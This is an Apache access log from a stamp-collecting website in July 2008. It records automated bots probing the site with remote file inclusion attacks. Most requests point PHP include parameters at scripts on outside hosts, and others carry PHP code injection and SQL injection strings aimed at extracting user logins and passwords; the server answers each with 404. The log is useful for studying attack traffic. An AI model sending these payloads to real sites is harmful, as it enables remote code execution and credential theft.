85.10.128.148 - - [27/Jul/2008:20:07:30 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:07:37 -0700] "GET /logs/access_080421.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:07:37 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:08:37 -0700] "GET /logs/access_080526.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:08:54 -0700] "GET /logs/access_080526.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
74.6.22.108 - - [27/Jul/2008:20:09:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
74.6.22.108 - - [27/Jul/2008:20:09:08 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
217.20.175.69 - - [27/Jul/2008:20:09:55 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:10:33 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:20:10:40 -0700] "GET /logs/access_080505.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:10:49 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:20:13:02 -0700] "GET /logs/access_080609.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:20:16:16 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:18:34 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:18:46 -0700] "GET /logs/access_080602.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:18:47 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:18:49 -0700] "GET /logs/access_080602.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:18:49 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:20:19:39 -0700] "GET /logs/access_080616.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:19:42 -0700] "GET /logs/access_080616.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:20:13 -0700] "GET /errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.20.175.69 - - [27/Jul/2008:20:23:09 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.175.69 - - [27/Jul/2008:20:23:10 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
206.71.148.152 - - [27/Jul/2008:20:24:00 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:24:21 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:24:21 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:20:25:05 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:20:25:05 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.246.77.172 - - [27/Jul/2008:20:26:04 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vietnamsinglesclub.taivietnam.com/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.mathstamps.com"
216.246.77.172 - - [27/Jul/2008:20:26:04 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vietnamsinglesclub.taivietnam.com/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.mathstamps.com"
69.13.27.210 - - [27/Jul/2008:20:26:32 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.167.38 - - [27/Jul/2008:20:33:11 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://hibbard22.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.167.38 - - [27/Jul/2008:20:33:11 -0700] "GET /lostpasswd.php?env[include_prefix]=http://hibbard22.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
118.129.167.38 - - [27/Jul/2008:20:33:11 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://hibbard22.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:36:43 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:36:43 -0700] "GET /logs/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.98.1.12 - - [27/Jul/2008:20:37:46 -0700] "GET /logs/access_080414.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.98.1.12 - - [27/Jul/2008:20:37:46 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.98.1.12 - - [27/Jul/2008:20:37:46 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
118.129.167.38 - - [27/Jul/2008:20:38:20 -0700] "GET /lostpasswd.php?env[include_prefix]=http://hibbard22.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:38:22 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:38:22 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:38:22 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
89.111.173.68 - - [27/Jul/2008:20:38:29 -0700] "GET /logs/access_080414.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.173.68 - - [27/Jul/2008:20:38:29 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.173.68 - - [27/Jul/2008:20:38:29 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.98.1.12 - - [27/Jul/2008:20:41:03 -0700] "GET /logs/access_080602.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:41:29 -0700] "GET /logs/access_080526.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:20:41:30 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:20:42:31 -0700] "GET /logs/access_080707.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:20:42:32 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:20:42:32 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.173.68 - - [27/Jul/2008:20:43:06 -0700] "GET /logs/access_080602.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:44:50 -0700] "GET /logs/access_080526.log/lostpasswd.php?env[include_prefix]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.20.175.69 - - [27/Jul/2008:20:46:01 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.22.204.76 - - [27/Jul/2008:20:47:33 -0700] "GET /logs/access_080602.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
203.22.204.76 - - [27/Jul/2008:20:47:33 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
203.22.204.76 - - [27/Jul/2008:20:47:33 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
67.195.37.124 - - [27/Jul/2008:20:54:07 -0700] "GET /logs/access_080414.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:20:56:49 -0700] "GET /line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:20:56:49 -0700] "GET /logs/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
75.127.70.16 - - [27/Jul/2008:20:56:49 -0700] "GET /logs/access_080324.log%20/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.13.27.210 - - [27/Jul/2008:20:57:17 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.13.27.210 - - [27/Jul/2008:20:57:17 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.172.55.13 - - [27/Jul/2008:20:57:56 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.44.208.63 - - [27/Jul/2008:20:59:19 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.208.63 - - [27/Jul/2008:20:59:19 -0700] "GET /logs/access_080630.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.208.63 - - [27/Jul/2008:20:59:19 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.208.63 - - [27/Jul/2008:21:00:48 -0700] "GET /logs/access_080616.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.208.63 - - [27/Jul/2008:21:01:02 -0700] "GET /logs/access_080310.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.13.27.210 - - [27/Jul/2008:21:02:45 -0700] "GET /logs/access_080602.log//include/admin.lib.inc.php?site_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
62.76.116.20 - - [27/Jul/2008:21:02:54 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.76.116.20 - - [27/Jul/2008:21:02:54 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.76.116.20 - - [27/Jul/2008:21:02:54 -0700] "GET /logs/access_080630.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:21:05:13 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:21:05:14 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:21:05:14 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.76.116.20 - - [27/Jul/2008:21:05:23 -0700] "GET /logs/access_080616.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.76.116.20 - - [27/Jul/2008:21:06:17 -0700] "GET /logs/access_080310.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:21:10:55 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:21:10:55 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:21:10:56 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:21:11:19 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.208.63 - - [27/Jul/2008:21:11:41 -0700] "GET /logs/access_080616.log%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
87.106.214.193 - - [27/Jul/2008:21:11:51 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.214.193 - - [27/Jul/2008:21:11:51 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.214.193 - - [27/Jul/2008:21:11:51 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.246.28.208 - - [27/Jul/2008:21:12:03 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://213.238.52.61/coinsworld/werbung/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.28.208 - - [27/Jul/2008:21:12:03 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://213.238.52.61/coinsworld/werbung/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.28.208 - - [27/Jul/2008:21:12:03 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://213.238.52.61/coinsworld/werbung/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
213.33.84.163 - - [27/Jul/2008:21:12:04 -0700] "GET /logs/access_080512.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.33.84.163 - - [27/Jul/2008:21:12:04 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.33.84.163 - - [27/Jul/2008:21:12:05 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:21:14:20 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.207.106.54 - - [27/Jul/2008:21:14:49 -0700] "GET /logs/access_080630.log//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.218.85.18 - - [27/Jul/2008:21:15:11 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [27/Jul/2008:21:15:12 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [27/Jul/2008:21:15:13 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.130.15 - - [27/Jul/2008:21:15:44 -0700] "GET /logs/access_080526.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
77.221.130.15 - - [27/Jul/2008:21:15:44 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
77.221.130.15 - - [27/Jul/2008:21:15:45 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:21:16:52 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:21:16:52 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.245.87.117 - - [27/Jul/2008:21:16:53 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
118.129.167.38 - - [27/Jul/2008:21:16:54 -0700] "GET /logs/access_080526.log/lostpasswd.php?env[include_prefix]=http://hibbard22.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.218.85.18 - - [27/Jul/2008:21:17:55 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:21:18:27 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:21:18:28 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
213.33.84.163 - - [27/Jul/2008:21:18:42 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://213.238.52.61/coinsworld/werbung/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
